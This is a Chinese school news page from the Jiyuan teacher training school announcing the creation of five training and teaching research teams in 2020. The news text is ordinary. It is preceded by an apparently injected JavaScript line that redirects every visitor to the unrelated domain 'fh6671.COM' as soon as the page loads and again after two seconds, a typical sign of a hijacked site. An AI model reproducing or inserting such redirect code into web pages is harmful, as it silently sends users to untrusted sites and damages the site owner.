function jumurl(){ window.location.href = 'fh6671.COM' } setTimeout(jumurl,2000); jumurl();

领航人工计划

   
您现在的位置: 济源市教师进修学校 >> 信息中心 >> 校园动态 >> 校园新闻 >> 正文 今天是:
我校组建培训教学研究团队
作者:佚名    信息来源:本站原创    点击数:167    更新时间:2020/10/9    
          ★★★ 【字体:

202093日上午,我校刚启用的多媒体教室里弥漫着热烈而庄重的气氛。教师进修学校培训教学研究团队成立仪式在这里进行。

 

在学校课程开发与体系建设小组的指导下,依据培训课程体系建设的要求,教师进修学校成立了家庭教育研究团队、班级管理研究团队、信息技术研究团队、校本研修研究团队、培训组织研究团队共五个教学内容研究团队。

        

成立仪式上,刘翠平主任和牛祖慰主任分别宣读了团队及成员名单、团队工作章程,学校课程建设小组组长史小刚副校长介绍了培训教学研究团队成立的缘由和意义,对培训教学团队下一步工作提出具体要求和建议,李竹青校长对培训教学研究团队的运行保障方面表达支持,并对团队建设、课程建设等内容提出了具体要求。

  

培训教学研究是2017年以来教师进修学校研培员业务素质能力提升的一个重要内容,是发挥教师进修学校“三服务一辐射”(服务中小学、服务中小学教学、服务中小学教师和辐射社区)功能的客观要求。

  

培训教学研究团队是推动学校培训教学工作的“蓄水池”和“助动器”。它可以为学校职能科室项目策划提供科学咨询,为项目实施提供合格师资和课程资源,为课程实施提供教学指导和合理建议。具体地说,培训教学研究团队承担着开发培训课程、实施培训教学和承担第三方评估服务等具体任务。

 

培训教学研究团队的成立改变了教师进修学校培训教学研究中单打独斗、零敲碎打的现象,有利于形成理性、规范、持续发展的良好局面。它适应了中小学教师培训教学发展的需要,也对教师进修学校的管理和研培员的专长提出了严峻挑战。

 

培训教学研究团队的成立是一个重要标志。它标志着教师进修和研培员都开始关注并着力研究培训内容和教学实施过程,标志着教师进修学校研培员将不仅仅培训任务的组织管理者同时也将是教学内容的研究者和实施者,标志着具有济源地方特色的培训课程体系和课程内容研究进入了新的阶段。这将有力推动教师进修学校研培员核心能力的快速提升,并加速形成具有济源地方特色的培训课程体系。

 

信息录入:jyjsjx    责任编辑:jyjsjx 
  • 上一篇信息:

  • 下一篇信息:
  • 发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口
    网友评论:(只显示最新10条。评论内容只代表网友观点,与本站立场无关!)